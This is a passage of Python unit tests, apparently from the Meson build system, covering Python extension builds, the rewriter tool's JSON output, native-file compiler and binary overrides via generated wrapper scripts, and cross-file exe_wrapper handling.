'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
class PythonTests(BasePlatformTests):
'''
Tests that verify compilation of python extension modules
'''
def test_versions(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Skipping python tests with {} backend'.format(self.backend.name))
testdir = os.path.join(self.src_root, 'test cases', 'unit', '39 python extmodule')
# No python version specified, this will use meson's python
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
# When specifying a known name, (python2 / python3) the module
# will also try 'python' as a fallback and use it if the major
# version matches
try:
self.init(testdir, extra_args=['-Dpython=python2'])
self.build()
self.run_tests()
except unittest.SkipTest:
# python2 is not necessarily installed on the test machine,
# if it is not, or the python headers can't be found, the test
# will raise MESON_SKIP_TEST, we could check beforehand what version
# of python is available, but it's a bit of a chicken and egg situation,
# as that is the job of the module, so we just ask for forgiveness rather
# than permission.
pass
self.wipe()
for py in ('pypy', 'pypy3'):
try:
self.init(testdir, extra_args=['-Dpython=%s' % py])
except unittest.SkipTest:
# Same as above, pypy2 and pypy3 are not expected to be present
# on the test system, the test project only raises in these cases
continue
# We have a pypy, this is expected to work
self.build()
self.run_tests()
self.wipe()
# The test is configured to error out with MESON_SKIP_TEST
# in case it could not find python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=not-python'])
self.wipe()
# While dir is an external command on both Windows and Linux,
# it certainly isn't python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=dir'])
self.wipe()
class RewriterTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.maxDiff = None
def prime(self, dirname):
copy_tree(os.path.join(self.rewrite_test_dir, dirname), self.builddir)
def rewrite_raw(self, directory, args):
if isinstance(args, str):
args = [args]
command = self.rewrite_command + ['--verbose', '--skip', '--sourcedir', directory] + args
p = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=True, timeout=60)
print('STDOUT:')
print(p.stdout)
print('STDERR:')
print(p.stderr)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
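        # The rewriter emits its machine-readable JSON on stderr; stdout only
        # carries the human-readable log echoed above.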
if not p.stderr:
return {}
return json.loads(p.stderr)
def rewrite(self, directory, args):
if isinstance(args, str):
args = [args]
return self.rewrite_raw(directory, ['command'] + args)
def test_target_source_list(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_add_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['a5.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['a5.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['a3.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp', 'a4.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_add_sources_abs(self):
self.prime('1 basic')
abs_src = [os.path.join(self.builddir, x) for x in ['a1.cpp', 'a2.cpp', 'a6.cpp']]
add = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "src_add", "sources": abs_src}])
inf = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "info"}])
self.rewrite(self.builddir, add)
out = self.rewrite(self.builddir, inf)
expected = {'target': {'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}}}
self.assertDictEqual(out, expected)
def test_target_remove_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'rmSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileC.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_subdir(self):
self.prime('2 subdirs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c', 'third.c']}
self.assertDictEqual(list(out['target'].values())[0], expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(list(out['target'].values())[0], expected)
def test_target_remove(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_tatrget_add(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog10@sha': {'name': 'trivialprog10', 'sources': ['new1.cpp', 'new2.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_remove_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, {})
def test_target_add_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c']}
self.assertDictEqual(out['target']['94b671c@@something@exe'], expected)
def test_target_source_sorting(self):
self.prime('5 sorting')
add_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'src_add', 'sources': ['a666.c']}])
inf_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'info'}])
out = self.rewrite(self.builddir, add_json)
out = self.rewrite(self.builddir, inf_json)
expected = {
'target': {
'exe1@exe': {
'name': 'exe1',
'sources': [
'aaa/a/a1.c',
'aaa/b/b1.c',
'aaa/b/b2.c',
'aaa/f1.c',
'aaa/f2.c',
'aaa/f3.c',
'bbb/a/b1.c',
'bbb/b/b2.c',
'bbb/c1/b5.c',
'bbb/c2/b7.c',
'bbb/c10/b6.c',
'bbb/a4.c',
'bbb/b3.c',
'bbb/b4.c',
'bbb/b5.c',
'a1.c',
'a2.c',
'a3.c',
'a10.c',
'a20.c',
'a30.c',
'a100.c',
'a101.c',
'a110.c',
'a210.c',
'a666.c',
'b1.c',
'c2.c'
]
}
}
}
self.assertDictEqual(out, expected)
def test_target_same_name_skip(self):
self.prime('4 same name targets')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'myExe', 'sources': ['main.cpp']}
self.assertEqual(len(out['target']), 2)
for val in out['target'].values():
self.assertDictEqual(expected, val)
def test_kwargs_info(self):
self.prime('3 kwargs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.2', 'meson_version': '0.50.0', 'license': ['GPL', 'MIT']},
'target#tgt1': {'build_by_default': False, 'build_rpath': '/usr/local', 'dependencies': 'dep1'},
'dependency#dep1': {'required': True, 'method': 'cmake'}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_add(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'add.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': ['GPL', 'MIT', 'BSD']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': 'GPL'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove_regex(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove_regex.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {},
'target#tgt1': {},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=True', 'cpp_std=c++11']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['cpp_std=c++14', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
class NativeFileTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.testcase = os.path.join(self.unit_test_dir, '47 native file binary')
self.current_config = 0
self.current_wrapper = 0
def helper_create_native_file(self, values):
"""Create a config file as a temporary file.
values should be a nested dictionary structure of {section: {key:
value}}
"""
filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config))
self.current_config += 1
with open(filename, 'wt') as f:
for section, entries in values.items():
f.write('[{}]\n'.format(section))
for k, v in entries.items():
f.write("{}='{}'\n".format(k, v))
return filename
def helper_create_binary_wrapper(self, binary, dir_=None, extra_args=None, **kwargs):
"""Creates a wrapper around a binary that overrides specific values."""
filename = os.path.join(dir_ or self.builddir, 'binary_wrapper{}.py'.format(self.current_wrapper))
extra_args = extra_args or {}
self.current_wrapper += 1
if is_haiku():
chbang = '#!/bin/env python3'
else:
chbang = '#!/usr/bin/env python3'
with open(filename, 'wt') as f:
f.write(textwrap.dedent('''\
{}
import argparse
import subprocess
import sys
def main():
parser = argparse.ArgumentParser()
'''.format(chbang)))
for name in chain(extra_args, kwargs):
f.write(' parser.add_argument("-{0}", "--{0}", action="store_true")\n'.format(name))
f.write(' args, extra_args = parser.parse_known_args()\n')
for name, value in chain(extra_args.items(), kwargs.items()):
f.write(' if args.{}:\n'.format(name))
f.write(' print("{}", file=sys.{})\n'.format(value, kwargs.get('outfile', 'stdout')))
f.write(' sys.exit(0)\n')
f.write(textwrap.dedent('''
ret = subprocess.run(
["{}"] + extra_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
print(ret.stdout.decode('utf-8'))
print(ret.stderr.decode('utf-8'), file=sys.stderr)
sys.exit(ret.returncode)
if __name__ == '__main__':
main()
'''.format(binary)))
if not is_windows():
os.chmod(filename, 0o755)
return filename
# On windows we need yet another level of indirection, as cmd cannot
# invoke python files itself, so instead we generate a .bat file, which
# invokes our python wrapper
batfile = os.path.join(self.builddir, 'binary_wrapper{}.bat'.format(self.current_wrapper))
with open(batfile, 'wt') as f:
f.write(r'@{} {} %*'.format(sys.executable, filename))
return batfile
def helper_for_compiler(self, lang, cb, for_machine = MachineChoice.HOST):
"""Helper for generating tests for overriding compilers for langaugages
with more than one implementation, such as C, C++, ObjC, ObjC++, and D.
"""
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, for_machine)
cc = getter()
binary, newid = cb(cc)
env.binaries[for_machine].binaries[lang] = binary
compiler = getter()
self.assertEqual(compiler.id, newid)
def test_multiple_native_files_override(self):
wrapper = self.helper_create_binary_wrapper('bash', version='foo')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config2 = self.helper_create_native_file({'binaries': {'bash': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
# This test hangs on cygwin.
@unittest.skipIf(os.name != 'posix' or is_cygwin(), 'Uses fifos, which are not available on non Unix OSes.')
def test_native_file_is_pipe(self):
fifo = os.path.join(self.builddir, 'native.file')
os.mkfifo(fifo)
with tempfile.TemporaryDirectory() as d:
wrapper = self.helper_create_binary_wrapper('bash', d, version='12345')
def filler():
with open(fifo, 'w') as f:
f.write('[binaries]\n')
f.write("bash = '{}'\n".format(wrapper))
thread = threading.Thread(target=filler)
thread.start()
self.init(self.testcase, extra_args=['--native-file', fifo, '-Dcase=find_program'])
thread.join()
os.unlink(fifo)
self.init(self.testcase, extra_args=['--wipe'])
def test_multiple_native_files(self):
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('python')
config2 = self.helper_create_native_file({'binaries': {'python': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
def _simple_test(self, case, binary, entry=None):
wrapper = self.helper_create_binary_wrapper(binary, version='12345')
config = self.helper_create_native_file({'binaries': {entry or binary: wrapper}})
self.init(self.testcase, extra_args=['--native-file', config, '-Dcase={}'.format(case)])
def test_find_program(self):
self._simple_test('find_program', 'bash')
def test_config_tool_dep(self):
# Do the skip at this level to avoid screwing up the cache
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with LLVM on MSYS2')
if not shutil.which('llvm-config'):
            raise unittest.SkipTest('llvm-config not installed, cannot test')
self._simple_test('config_dep', 'llvm-config')
def test_python3_module(self):
self._simple_test('python3', 'python3')
def test_python_module(self):
if is_windows():
# Bat adds extra crap to stdout, so the version check logic in the
# python module breaks. This is fine on other OSes because they
# don't need the extra indirection.
raise unittest.SkipTest('bat indirection breaks internal sanity checks.')
elif is_osx():
binary = 'python'
else:
binary = 'python2'
        # We may not have python2 installed; check for it
for v in ['2', '2.7', '-2.7']:
rc = subprocess.call(['pkg-config', '--cflags', 'python{}'.format(v)],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
if rc == 0:
break
else:
raise unittest.SkipTest('Not running Python 2 tests because dev packages not installed.')
self._simple_test('python', binary, entry='python')
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CC')
def test_c_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('c', cb)
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CXX')
def test_cpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('cpp', cb)
@skip_if_not_language('objc')
@skip_if_env_set('OBJC')
def test_objc_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('objc', cb)
@skip_if_not_language('objcpp')
@skip_if_env_set('OBJCXX')
def test_objcpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('objcpp', cb)
@skip_if_not_language('d')
@skip_if_env_set('DC')
def test_d_compiler(self):
def cb(comp):
if comp.id == 'dmd':
if shutil.which('ldc'):
return 'ldc', 'ldc'
elif shutil.which('gdc'):
return 'gdc', 'gdc'
else:
raise unittest.SkipTest('No alternative dlang compiler found.')
if shutil.which('dmd'):
return 'dmd', 'dmd'
raise unittest.SkipTest('No alternative dlang compiler found.')
self.helper_for_compiler('d', cb)
@skip_if_not_language('cs')
@skip_if_env_set('CSC')
def test_cs_compiler(self):
def cb(comp):
if comp.id == 'csc':
if not shutil.which('mcs'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'mcs', 'mcs'
if not shutil.which('csc'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'csc', 'csc'
self.helper_for_compiler('cs', cb)
@skip_if_not_language('fortran')
@skip_if_env_set('FC')
def test_fortran_compiler(self):
def cb(comp):
if comp.id == 'lcc':
if shutil.which('lfortran'):
return 'lfortran', 'lcc'
raise unittest.SkipTest('No alternate Fortran implementation.')
elif comp.id == 'gcc':
if shutil.which('ifort'):
# There is an ICC for windows (windows build, linux host),
                    # but we don't support that ATM so let's not worry about it.
if is_windows():
return 'ifort', 'intel-cl'
return 'ifort', 'intel'
elif shutil.which('flang'):
return 'flang', 'flang'
elif shutil.which('pgfortran'):
return 'pgfortran', 'pgi'
# XXX: there are several other fortran compilers meson
# supports, but I don't have any of them to test with
raise unittest.SkipTest('No alternate Fortran implementation.')
if not shutil.which('gfortran'):
raise unittest.SkipTest('No alternate Fortran implementation.')
return 'gfortran', 'gcc'
self.helper_for_compiler('fortran', cb)
def _single_implementation_compiler(self, lang, binary, version_str, version):
"""Helper for languages with a single (supported) implementation.
Builds a wrapper around the compiler to override the version.
"""
wrapper = self.helper_create_binary_wrapper(binary, version=version_str)
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, MachineChoice.HOST)
env.binaries.host.binaries[lang] = wrapper
compiler = getter()
self.assertEqual(compiler.version, version)
@skip_if_not_language('vala')
@skip_if_env_set('VALAC')
def test_vala_compiler(self):
self._single_implementation_compiler(
'vala', 'valac', 'Vala 1.2345', '1.2345')
@skip_if_not_language('rust')
@skip_if_env_set('RUSTC')
def test_rust_compiler(self):
self._single_implementation_compiler(
'rust', 'rustc', 'rustc 1.2345', '1.2345')
@skip_if_not_language('java')
def test_java_compiler(self):
self._single_implementation_compiler(
'java', 'javac', 'javac 9.99.77', '9.99.77')
@skip_if_not_language('swift')
def test_swift_compiler(self):
wrapper = self.helper_create_binary_wrapper(
'swiftc', version='Swift 1.2345', outfile='stderr',
extra_args={'Xlinker': 'macosx_version. PROJECT:ld - 1.2.3'})
env = get_fake_env()
env.binaries.host.binaries['swift'] = wrapper
compiler = env.detect_swift_compiler(MachineChoice.HOST)
self.assertEqual(compiler.version, '1.2345')
def test_native_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile')])
def test_native_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib'])
def test_compile_sys_path(self):
"""Compiling with a native file stored in a system path works.
There was a bug which caused the paths to be stored incorrectly and
would result in ninja invoking meson in an infinite loop. This tests
for that by actually invoking ninja.
"""
testcase = os.path.join(self.common_test_dir, '1 trivial')
# It really doesn't matter what's in the native file, just that it exists
config = self.helper_create_native_file({'binaries': {'bash': 'false'}})
self.init(testcase, extra_args=['--native-file', config])
self.build()
class CrossFileTests(BasePlatformTests):
"""Tests for cross file functionality not directly related to
cross compiling.
    This is mainly aimed at testing overrides from cross files.
"""
def _cross_file_generator(self, *, needs_exe_wrapper: bool = False,
exe_wrapper: T.Optional[T.List[str]] = None) -> str:
if is_windows():
raise unittest.SkipTest('Cannot run this test on non-mingw/non-cygwin windows')
if is_sunos():
cc = 'gcc'
else:
cc = 'cc'
return textwrap.dedent("""\
[binaries]
c = '/usr/bin/{}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
{}
[properties]
needs_exe_wrapper = {}
[host_machine]
system = 'linux'
cpu_family = 'x86'
cpu = 'i686'
endian = 'little'
""".format(cc,
'exe_wrapper = {}'.format(str(exe_wrapper)) if exe_wrapper is not None else '',
needs_exe_wrapper))
def _stub_exe_wrapper(self) -> str:
return textwrap.dedent('''\
#!/usr/bin/env python3
import subprocess
import sys
sys.exit(subprocess.run(sys.argv[1:]).returncode)
''')
def test_needs_exe_wrapper_true(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(needs_exe_wrapper=True))
self.init(testdir, extra_args=['--cross-file=' + str(p)])
out = self.run_target('test')
self.assertRegex(out, r'Skipped:\s*1\s*\n')
def test_needs_exe_wrapper_false(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(needs_exe_wrapper=False))
self.init(testdir, extra_args=['--cross-file=' + str(p)])
out = self.run_target('test')
self.assertNotRegex(out, r'Skipped:\s*1\n')
def test_needs_exe_wrapper_true_wrapper(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
s = Path(d) / 'wrapper.py'
with s.open('wt') as f:
f.write(self._stub_exe_wrapper())
s.chmod(0o774)
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(
needs_exe_wrapper=True,
exe_wrapper=[str(s)]))
self.init(testdir, extra_args=['--cross-file=' + str(p), '-Dexpect=true'])
out = self.run_target('test')
self.assertRegex(out, r'Ok:\s*3\s*\n')
def test_cross_exe_passed_no_wrapper(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(needs_exe_wrapper=True))
self.init(testdir, extra_args=['--cross-file=' + str(p)])
self.build()
out = self.run_target('test')
self.assertRegex(out, r'Skipped:\s*1\s*\n')
# The test uses mocking and thus requires that the current process is the
# one to run the Meson steps. If we are using an external test executable
# (most commonly in Debian autopkgtests) then the mocking won't work.
@unittest.skipIf('MESON_EXE' in os.environ, 'MESON_EXE is defined, can not use mocking.')
def test_cross_file_system_paths(self):
if is_windows():
raise unittest.SkipTest('system crossfile paths not defined for Windows (yet)')
testdir = os.path.join(self.common_test_dir, '1 trivial')
cross_content = self._cross_file_generator()
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
with mock.patch.dict(os.environ, {'XDG_DATA_HOME': d}):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with mock.patch.dict(os.environ, {'XDG_DATA_DIRS': d}):
os.environ.pop('XDG_DATA_HOME', None)
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, '.local', 'share', 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
# If XDG_DATA_HOME is set in the environment running the
            # tests this test will fail, so mock the environment, pop
# it, then test
with mock.patch.dict(os.environ):
os.environ.pop('XDG_DATA_HOME', None)
with mock.patch('mesonbuild.coredata.os.path.expanduser', lambda x: x.replace('~', d)):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
def test_cross_file_dirs(self):
